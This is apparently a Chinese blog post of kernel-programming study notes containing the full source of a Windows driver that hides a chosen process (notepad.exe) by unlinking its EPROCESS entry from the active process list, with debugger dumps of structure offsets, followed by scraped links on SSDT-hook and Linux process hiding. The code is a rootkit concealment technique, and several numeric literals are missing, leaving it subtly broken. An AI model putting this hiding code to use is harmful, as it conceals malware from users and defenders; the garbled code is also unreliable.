最近在学习内核编程,记录一下最近的学习笔记。

原理:将当前进程从eprocess结构的链表中删除

无法被! process 0 0 看见

#include "HideProcess.h"

#ifdef WIN64

#define ACTIVEPROCESSLINKS_EPROCESS  0x188

#define IMAGEFILENAME_EPROCESS       0x2e0    //16个字节组成的单字数组

#else

#define ACTIVEPROCESSLINKS_EPROCESS  0x088

#define IMAGEFILENAME_EPROCESS       0x174    //16个字节组成的单字数组

#endif

NTSTATUS

    DriverEntry(PDRIVER_OBJECT  DriverObject,PUNICODE_STRING  RegisterPath)

{

    PDEVICE_OBJECT  DeviceObject;

    NTSTATUS        Status;

    int             i = ;

    UNICODE_STRING  DeviceName;

    UNICODE_STRING  LinkName;

    RtlInitUnicodeString(&DeviceName,DEVICE_NAME);

    RtlInitUnicodeString(&LinkName,LINK_NAME);

    //创建设备对象;

    Status = IoCreateDevice(DriverObject,,

    &DeviceName,FILE_DEVICE_UNKNOWN,,FALSE,&DeviceObject);

    if (!NT_SUCCESS(Status))

    {

        return Status;

    }

    Status = IoCreateSymbolicLink(&LinkName,&DeviceName);

    for (i = ; i<IRP_MJ_MAXIMUM_FUNCTION; i++)

    {

        DriverObject->MajorFunction[i] = DefaultPassThrough;

    }

    DriverObject->DriverUnload = UnloadDriver;

    if (HideProcess("notepad.exe") == FALSE)

    {

        DbgPrint("No Exist\r\n");

    }

#ifdef WIN64

    DbgPrint("WIN64: HideProcess IS RUNNING!!!");

#else

    DbgPrint("WIN32: HideProcess SIS RUNNING!!!");

#endif

    return STATUS_SUCCESS;

}

NTSTATUS

    DefaultPassThrough(PDEVICE_OBJECT  DeviceObject,PIRP Irp)

{

    Irp->IoStatus.Status = STATUS_SUCCESS;

    Irp->IoStatus.Information = ;

    IoCompleteRequest(Irp,IO_NO_INCREMENT);

    return STATUS_SUCCESS;

}

VOID

    UnloadDriver(PDRIVER_OBJECT DriverObject)

{

    UNICODE_STRING  LinkName;

    PDEVICE_OBJECT    NextDeviceObject    = NULL;

    PDEVICE_OBJECT  CurrentDeviceObject = NULL;

    RtlInitUnicodeString(&LinkName,LINK_NAME);

    IoDeleteSymbolicLink(&LinkName);

    CurrentDeviceObject = DriverObject->DeviceObject;

    while (CurrentDeviceObject != NULL)

    {

        NextDeviceObject = CurrentDeviceObject->NextDevice;

        IoDeleteDevice(CurrentDeviceObject);

        CurrentDeviceObject = NextDeviceObject;

    }

    DbgPrint("HideProcess IS STOPPED!!!");

}

BOOLEAN HideProcess(char* ProcessImageName)

{

    //通过进程EProcess (ObjectHeader ObjectBody)

    /*

    kd> !process 0 0

    PROCESS fffffa8031ec9060

    SessionId: 1  Cid: 073c    Peb: 7fffffdf000  ParentCid: 06f8

    DirBase: 7fb21000  ObjectTable: fffff8a001ea3600  HandleCount: 545.

    Image: explorer.exe

    kd> dt _eprocess fffffa8031ec9060

    +0x000 Pcb              : _KPROCESS

    +0x160 ProcessLock      : _EX_PUSH_LOCK

    +0x168 CreateTime       : _LARGE_INTEGER 0x01d29b23`d17ef664

    +0x170 ExitTime         : _LARGE_INTEGER 0x0

    +0x178 RundownProtect   : _EX_RUNDOWN_REF

    +0x180 UniqueProcessId  : 0x00000000`0000073c Void

    +0x188 ActiveProcessLinks : _LIST_ENTRY [ 0xfffffa80`31aeb1e8 - 0xfffffa80`3265da98 ]

    +0x198 ProcessQuotaUsage : [2] 0x3dc8

    kd> dt _LIST_ENTRY

    nt!_LIST_ENTRY

    +0x000 Flink            : Ptr64 _LIST_ENTRY    Next ListEntry

    +0x008 Blink            : Ptr64 _LIST_ENTRY    Previous

    kd> dt _eprocess 0xfffffa80`31aeb1e8-0x188

    nt!_EPROCESS

    +0x000 Pcb              : _KPROCESS

    +0x188 ActiveProcessLinks : _LIST_ENTRY [ 0xfffffa80`31ec84d8 - 0xfffffa80`31ec91e8 ]

    +0x2e0 ImageFileName    : [15]  "vmtoolsd.exe"

    [空头][System][][][][Explorer][vmtoolsd]

    */

    PLIST_ENTRY  ListEntry = NULL;

    PEPROCESS  EProcess = NULL;

    PEPROCESS  v1 = NULL;

    PEPROCESS  EmptyEProcess = NULL;

    char*      ImageFileName = NULL;

    EProcess = PsGetCurrentProcess();

    if (EProcess == NULL)

    {

        return FALSE;

    }

    ImageFileName = (char*)((UINT8*)v1 + IMAGEFILENAME_EPROCESS);

    DbgPrint("CurrentImageFileName:%s\r\n", ImageFileName);

    v1 = EProcess;   //System.exe  EProcess

    //System.exe  的前一个 实际上是一个空头节点

    ListEntry = (PLIST_ENTRY)((UINT8*)EProcess + ACTIVEPROCESSLINKS_EPROCESS);  //0x188

    EmptyEProcess = (PEPROCESS)(((ULONG_PTR)(ListEntry->Blink)) - ACTIVEPROCESSLINKS_EPROCESS);

    ListEntry = NULL;

    while (v1 != EmptyEProcess)  //System!=空头节点

    {

        ImageFileName = (char*)((UINT8*)v1 + IMAGEFILENAME_EPROCESS);   //System.exe   Calc.exe

        //DbgPrint("ImageFileName:%s\r\n",szImageFileName);

        ListEntry = (PLIST_ENTRY)((ULONG_PTR)v1 + ACTIVEPROCESSLINKS_EPROCESS);

        if (strstr(ImageFileName, ProcessImageName) != NULL)

        {

            if (ListEntry != NULL)

            {

                RemoveEntryList(ListEntry);

                break;

            }

        }

        v1 = (PEPROCESS)(((ULONG_PTR)(ListEntry->Flink)) - ACTIVEPROCESSLINKS_EPROCESS);  //Calc

    }

    return TRUE;

}

ring0 进程隐藏实现的更多相关文章

  1. SSDT Hook实现简单的进程隐藏和保护【转载】

    原文链接:http://www.blogfshare.com/ssdthook-hide-protect.html 原文作者:AloneMonkey SSDT Hook实现简单的进程隐藏和保护 Alo ...

  2. 进程隐藏与进程保护(SSDT Hook 实现)(二)

    文章目录:                   1. 引子 – Demo 实现效果: 2. 进程隐藏与进程保护概念: 3. SSDT Hook 框架搭建: 4. Ring0 实现进程隐藏: 5. Ri ...

  3. Windows2003 内核级进程隐藏、侦测技术

    论文关键字: 内核 拦截 活动进程链表 系统服务派遣表 线程调度链 驱动程序简介    论文摘要:信息对抗是目前计算机发展的一个重要的方向,为了更好的防御,必须去深入的了解敌人进攻的招式.信息对抗促使 ...

  4. Linux下进程隐藏的方法及其对抗

    零.背景 在应急响应中,经常碰到ps命令和top命令查不到恶意进程(异常进程)的情况,会对应急响应造成很大的影响.轻则浪费时间,重则排查不出问题,让黑客逍遥法外.所以这篇博客研究学习如何对抗linux ...

  5. CRUX下实现进程隐藏(1)

    想必能找到这里的都是被吴一民的操作系统大作业坑过的学弟学妹了,当初我也是千辛万苦才把这个作业完成了,本着服务后辈的宗旨,尽量让学弟学妹少走弯路,我会把实现的大概思路记录下来.本系列一共三篇文章,分别实 ...

  6. CRUX下实现进程隐藏(2)

    前面我们介绍了如何修改/proc目录读取函数的方法实现进程隐藏.这篇博文将介绍另一种方法—— 劫持系统调用实现进程隐藏. 其基本原理是:加载一个内核模块(LKM),通过劫持系统调用sys_getden ...

  7. CRUX下实现进程隐藏(3)

    通过一个内核模块拦截文件系统的回调函数来实现进程隐藏. VFS(Virtual File System)是Linux在实际文件系统(如ext3,ext4,vfat等)上抽象出的一个文件系统模型,简单来 ...

  8. 进程隐藏与进程保护(SSDT Hook 实现)(三)

    文章目录: 1. 引子: 2. 获取当前系统下所有进程: 3. 服务管理(安装,启动,停止,卸载): 4. 应用程序和内核程序通信: 5. 小结: 1. 引子: 关于这个 SSDT Hook 实现进程 ...

  9. linux进程隐藏手段及对抗方法

    1.命令替换 实现方法 替换系统中常见的进程查看工具(比如ps.top.lsof)的二进制程序 对抗方法 使用stat命令查看文件状态并且使用md5sum命令查看文件hash,从干净的系统上拷贝这些工 ...

随机推荐

  1. git学习中遇到的疑难杂症

    GIT仓库如何恢复到前一次提交 一.通过使用Git版本恢复命令reset,可以回退版本 reset命令有3种方式: 1.git   reset   –mixed:此为默认方式,不带任何参数的git r ...

  2. bootstrap多选框

    不多说,先上图片 本多选框是用的bootstrap的样式为基础,将弹出框css改造,然后自己写的js得到. 下面为全部页面的代码,需要的可以自己改动js,得到自己需要的效果 <!DOCTYPE ...

  3. Java字符串拆分和字符串连接

    Java字符串拆分/连接 public class LierString{ //------------------------------------------------------------ ...

  4. Netcore中实现字段和属性注入

    https://www.cnblogs.com/loogn/p/10566510.html 简单来说,使用Ioc模式需要两个步骤,第一是把服务注册到容器中,第二是从容器中获取服务,我们一个一个讨论并演 ...

  5. from表单,图片预览,和表单提交

    <form> <input id="file" class="topsub-file" type="file" name= ...

  6. 【ACM】三点顺序

    三点顺序 时间限制:1000 ms  |  内存限制:65535 KB 难度:3   描述 现在给你不共线的三个点A,B,C的坐标,它们一定能组成一个三角形,现在让你判断A,B,C是顺时针给出的还是逆 ...

  7. 转 深入解析:一主多备DG环境,failover的实现过程详解 以及 11g 容灾库可以在线添加tempfile. 以及 11g 容灾库可以在线添加logile.

    https://yq.aliyun.com/articles/229600 核心,就是11g通过datafille_scn 号来追日志,而不是日志序列号来追日志. 加快standby switchov ...

  8. PHP jsonencode unicode 存储问题

    首先是这样的,因为输入的字符串的里面有德语的字符,如下: 当我存储到数据库之后,再用json_encode获取到数据库内的这些字符时,出问题了. 直接encode一个字符串"püüäöä&q ...

  9. Python查看类或Module的版本号

    >>> import keras >>> print keras.__version__ 1.2.0

  10. Git常用配置

    Git设置默认用户名和密码 1.进入C:\users\Administrator目录下,通过git bash终端输入touch .git-credentials后回车2.打开生成的.git-crede ...